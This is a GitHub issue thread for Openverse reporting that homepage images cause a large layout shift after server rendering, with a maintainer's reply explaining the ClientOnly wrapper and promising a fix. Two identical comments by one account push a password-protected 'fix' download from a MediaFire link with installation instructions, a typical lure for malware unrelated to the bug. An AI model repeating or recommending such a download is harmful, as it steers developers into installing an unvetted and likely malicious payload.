### ISSUE TITLE
Homepage images do not take up space until they have loaded in, causing a large layout shift after hydration and SSR

### ISSUE THREAD

**Issue by sarayourfriend** [WordPress/openverse#4815]
## Description

When visiting the homepage without a local and UI cookies, the homepage on a desktop viewport renders initially without the homepage images. Once the homepage images load, the previously present content of the page shifts far to the edge of the screen.

[Screencast_20240827_131801.webm](https://github.com/user-attachments/assets/c17efbb0-ddc7-4ce1-8d8b-4c1a8be65f8d)

## Reproduction

1.  Open a private browsing window and visit https://openverse.org
2.  See the shift present above

I can only reliably reproduce this in brand-new private browsing tabs, so I think it will only affect people who are visiting for the first time.

## Additional context

@obulat can you help triage this, I'm not sure what to put the priority as.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by obulat** [comment]
We've wrapped the gallery with "ClientOnly" to prevent client-server mismatch due to randomness of the images.  I played locally, and there's an easy fix for this very annoying problem. Thank you for opening this issue!
